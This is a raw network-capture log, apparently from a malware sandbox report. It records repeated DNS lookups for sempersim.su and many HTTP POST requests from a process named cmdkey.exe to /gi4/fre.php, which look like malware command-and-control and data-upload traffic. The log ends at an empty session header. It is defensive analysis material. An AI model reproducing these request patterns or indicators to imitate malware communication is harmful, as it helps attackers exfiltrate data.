                Aug 5, 2022 09:11:01.627075911 CEST53570378.8.8.8192.168.2.6
                Aug 5, 2022 09:11:04.707422972 CEST6264353192.168.2.68.8.8.8
                Aug 5, 2022 09:11:04.725037098 CEST53626438.8.8.8192.168.2.6
                Aug 5, 2022 09:11:09.042074919 CEST5208953192.168.2.68.8.8.8
                Aug 5, 2022 09:11:09.059701920 CEST53520898.8.8.8192.168.2.6
                Aug 5, 2022 09:11:13.360200882 CEST5269853192.168.2.68.8.8.8
                Aug 5, 2022 09:11:13.651448965 CEST53526988.8.8.8192.168.2.6
                Aug 5, 2022 09:11:17.691644907 CEST6190153192.168.2.68.8.8.8
                Aug 5, 2022 09:11:17.711220980 CEST53619018.8.8.8192.168.2.6
                Aug 5, 2022 09:11:19.957969904 CEST5008153192.168.2.68.8.8.8
                Aug 5, 2022 09:11:19.977475882 CEST53500818.8.8.8192.168.2.6
                Aug 5, 2022 09:11:25.186861038 CEST4952053192.168.2.68.8.8.8
                Aug 5, 2022 09:11:25.206568003 CEST53495208.8.8.8192.168.2.6
                Aug 5, 2022 09:11:29.434937954 CEST5304953192.168.2.68.8.8.8
                Aug 5, 2022 09:11:29.780754089 CEST53530498.8.8.8192.168.2.6
                Aug 5, 2022 09:11:32.959912062 CEST5212553192.168.2.68.8.8.8
                Aug 5, 2022 09:11:32.979403973 CEST53521258.8.8.8192.168.2.6
                Aug 5, 2022 09:11:35.598325014 CEST6310453192.168.2.68.8.8.8
                Aug 5, 2022 09:11:35.615509987 CEST53631048.8.8.8192.168.2.6
                Aug 5, 2022 09:11:38.248652935 CEST5508353192.168.2.68.8.8.8
                Aug 5, 2022 09:11:38.265628099 CEST53550838.8.8.8192.168.2.6
                Aug 5, 2022 09:11:40.989768982 CEST5836053192.168.2.68.8.8.8
                Aug 5, 2022 09:11:41.009398937 CEST53583608.8.8.8192.168.2.6
                Aug 5, 2022 09:11:45.132770061 CEST5972453192.168.2.68.8.8.8
                Aug 5, 2022 09:11:45.152010918 CEST53597248.8.8.8192.168.2.6
                Aug 5, 2022 09:11:53.220746040 CEST5910653192.168.2.68.8.8.8
                Aug 5, 2022 09:11:53.239579916 CEST53591068.8.8.8192.168.2.6
                Aug 5, 2022 09:11:55.669297934 CEST6065853192.168.2.68.8.8.8
                Aug 5, 2022 09:11:55.688886881 CEST53606588.8.8.8192.168.2.6
                Aug 5, 2022 09:11:57.984865904 CEST6536753192.168.2.68.8.8.8
                Aug 5, 2022 09:11:58.002449036 CEST53653678.8.8.8192.168.2.6
                Aug 5, 2022 09:12:00.716739893 CEST6457953192.168.2.68.8.8.8
                Aug 5, 2022 09:12:00.736135960 CEST53645798.8.8.8192.168.2.6
                Aug 5, 2022 09:12:03.092143059 CEST4946353192.168.2.68.8.8.8
                Aug 5, 2022 09:12:03.109128952 CEST53494638.8.8.8192.168.2.6
                Aug 5, 2022 09:12:05.451836109 CEST6415053192.168.2.68.8.8.8
                Aug 5, 2022 09:12:05.470995903 CEST53641508.8.8.8192.168.2.6
                Aug 5, 2022 09:12:11.720590115 CEST5232853192.168.2.68.8.8.8
                Aug 5, 2022 09:12:11.739883900 CEST53523288.8.8.8192.168.2.6
                Aug 5, 2022 09:12:15.716804028 CEST5742253192.168.2.68.8.8.8
                Aug 5, 2022 09:12:15.736053944 CEST53574228.8.8.8192.168.2.6
                Aug 5, 2022 09:12:19.016791105 CEST6384453192.168.2.68.8.8.8
                Aug 5, 2022 09:12:19.034816980 CEST53638448.8.8.8192.168.2.6
                Aug 5, 2022 09:12:22.498823881 CEST5726953192.168.2.68.8.8.8
                Aug 5, 2022 09:12:22.518322945 CEST53572698.8.8.8192.168.2.6
                Aug 5, 2022 09:12:25.018081903 CEST5164553192.168.2.68.8.8.8
                Aug 5, 2022 09:12:25.038153887 CEST53516458.8.8.8192.168.2.6
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 5, 2022 09:10:33.085999012 CEST192.168.2.68.8.8.80x24acStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:38.737056017 CEST192.168.2.68.8.8.80x4849Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:41.016165972 CEST192.168.2.68.8.8.80xdd6aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:43.391431093 CEST192.168.2.68.8.8.80xa4bdStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:45.856847048 CEST192.168.2.68.8.8.80xae18Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:49.152167082 CEST192.168.2.68.8.8.80x11dbStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:51.380842924 CEST192.168.2.68.8.8.80xdde2Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:53.761003971 CEST192.168.2.68.8.8.80xfcdaStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:56.080750942 CEST192.168.2.68.8.8.80x31f8Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:10:58.559113979 CEST192.168.2.68.8.8.80xe599Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:01.609616041 CEST192.168.2.68.8.8.80xa78aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:04.707422972 CEST192.168.2.68.8.8.80x9c33Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:09.042074919 CEST192.168.2.68.8.8.80xe1daStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:13.360200882 CEST192.168.2.68.8.8.80xb28cStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:17.691644907 CEST192.168.2.68.8.8.80x678Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:19.957969904 CEST192.168.2.68.8.8.80xc03cStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:25.186861038 CEST192.168.2.68.8.8.80xa2c6Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:29.434937954 CEST192.168.2.68.8.8.80x3f79Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:32.959912062 CEST192.168.2.68.8.8.80x79bcStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:35.598325014 CEST192.168.2.68.8.8.80x94ffStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:38.248652935 CEST192.168.2.68.8.8.80xf29aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:40.989768982 CEST192.168.2.68.8.8.80x6149Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:45.132770061 CEST192.168.2.68.8.8.80xe528Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:53.220746040 CEST192.168.2.68.8.8.80x4711Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:55.669297934 CEST192.168.2.68.8.8.80x121fStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:11:57.984865904 CEST192.168.2.68.8.8.80x8839Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:00.716739893 CEST192.168.2.68.8.8.80x5be5Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:03.092143059 CEST192.168.2.68.8.8.80xba2dStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:05.451836109 CEST192.168.2.68.8.8.80x8082Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:11.720590115 CEST192.168.2.68.8.8.80xf467Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:15.716804028 CEST192.168.2.68.8.8.80x8061Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:19.016791105 CEST192.168.2.68.8.8.80x626dStandard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:22.498823881 CEST192.168.2.68.8.8.80x16b4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                Aug 5, 2022 09:12:25.018081903 CEST192.168.2.68.8.8.80xaf68Standard query (0)sempersim.suA (IP address)IN (0x0001)
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 5, 2022 09:10:33.426615000 CEST8.8.8.8192.168.2.60x24acNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:38.756499052 CEST8.8.8.8192.168.2.60x4849No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:41.035986900 CEST8.8.8.8192.168.2.60xdd6aNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:43.411323071 CEST8.8.8.8192.168.2.60xa4bdNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:46.150372028 CEST8.8.8.8192.168.2.60xae18No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:49.169785976 CEST8.8.8.8192.168.2.60x11dbNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:51.400732994 CEST8.8.8.8192.168.2.60xdde2No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:53.780385971 CEST8.8.8.8192.168.2.60xfcdaNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:56.100101948 CEST8.8.8.8192.168.2.60x31f8No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:10:58.576757908 CEST8.8.8.8192.168.2.60xe599No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:01.627075911 CEST8.8.8.8192.168.2.60xa78aNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:04.725037098 CEST8.8.8.8192.168.2.60x9c33No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:09.059701920 CEST8.8.8.8192.168.2.60xe1daNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:13.651448965 CEST8.8.8.8192.168.2.60xb28cNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:17.711220980 CEST8.8.8.8192.168.2.60x678No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:19.977475882 CEST8.8.8.8192.168.2.60xc03cNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:25.206568003 CEST8.8.8.8192.168.2.60xa2c6No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:29.780754089 CEST8.8.8.8192.168.2.60x3f79No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:32.979403973 CEST8.8.8.8192.168.2.60x79bcNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:35.615509987 CEST8.8.8.8192.168.2.60x94ffNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:38.265628099 CEST8.8.8.8192.168.2.60xf29aNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:41.009398937 CEST8.8.8.8192.168.2.60x6149No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:45.152010918 CEST8.8.8.8192.168.2.60xe528No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:53.239579916 CEST8.8.8.8192.168.2.60x4711No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:55.688886881 CEST8.8.8.8192.168.2.60x121fNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:11:58.002449036 CEST8.8.8.8192.168.2.60x8839No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:00.736135960 CEST8.8.8.8192.168.2.60x5be5No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:03.109128952 CEST8.8.8.8192.168.2.60xba2dNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:05.470995903 CEST8.8.8.8192.168.2.60x8082No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:11.739883900 CEST8.8.8.8192.168.2.60xf467No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:15.736053944 CEST8.8.8.8192.168.2.60x8061No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:19.034816980 CEST8.8.8.8192.168.2.60x626dNo error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:22.518322945 CEST8.8.8.8192.168.2.60x16b4No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                Aug 5, 2022 09:12:25.038153887 CEST8.8.8.8192.168.2.60xaf68No error (0)sempersim.su45.11.26.144A (IP address)IN (0x0001)
                • sempersim.su
                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.64976745.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:33.531418085 CEST951OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 196
                Connection: close
                Aug 5, 2022 09:10:34.839971066 CEST952INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:23 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.64976845.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:38.844396114 CEST953OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 196
                Connection: close
                Aug 5, 2022 09:10:40.015507936 CEST953INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:29 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.64978845.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:01.711456060 CEST1137OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:02.864393950 CEST1138INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:52 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.64979145.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:04.815056086 CEST1156OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:06.091188908 CEST1156INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:55 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.64979545.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:09.138566971 CEST1202OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:10.306523085 CEST1203INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:59 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.64979745.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:13.734139919 CEST1210OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:14.894982100 CEST1211INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:04 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.64979945.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:17.792361021 CEST1218OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:18.985893011 CEST1219INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:08 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.64980445.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:20.056412935 CEST1240OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:21.507118940 CEST9094INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:10 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.64980645.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:25.288207054 CEST9094OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:26.638696909 CEST9095INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.64980845.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:29.964195967 CEST9103OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:31.149560928 CEST9103INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:20 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.64981145.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:33.059062958 CEST10689OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:34.337182045 CEST10689INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:23 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.64981245.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:35.695581913 CEST10690OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:36.832118034 CEST10691INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:26 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.64976945.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:10:41.114928007 CEST954OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:10:42.315303087 CEST955INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:10:31 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.64981345.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:38.357336998 CEST10692OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:39.718839884 CEST10692INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:28 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.64981445.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:41.090702057 CEST10693OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:42.316827059 CEST10698INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:31 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.64981645.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:45.230366945 CEST10699OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:46.446492910 CEST10700INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:35 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.64981845.11.26.14480C:\Windows\SysWOW64\cmdkey.exe
                TimestampkBytes transferredDirectionData
                Aug 5, 2022 09:11:53.331696033 CEST10708OUTPOST /gi4/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: sempersim.su
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: AA29FF80
                Content-Length: 169
                Connection: close
                Aug 5, 2022 09:11:54.547530890 CEST10714INHTTP/1.0 404 Not Found
                Date: Fri, 05 Aug 2022 07:11:43 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
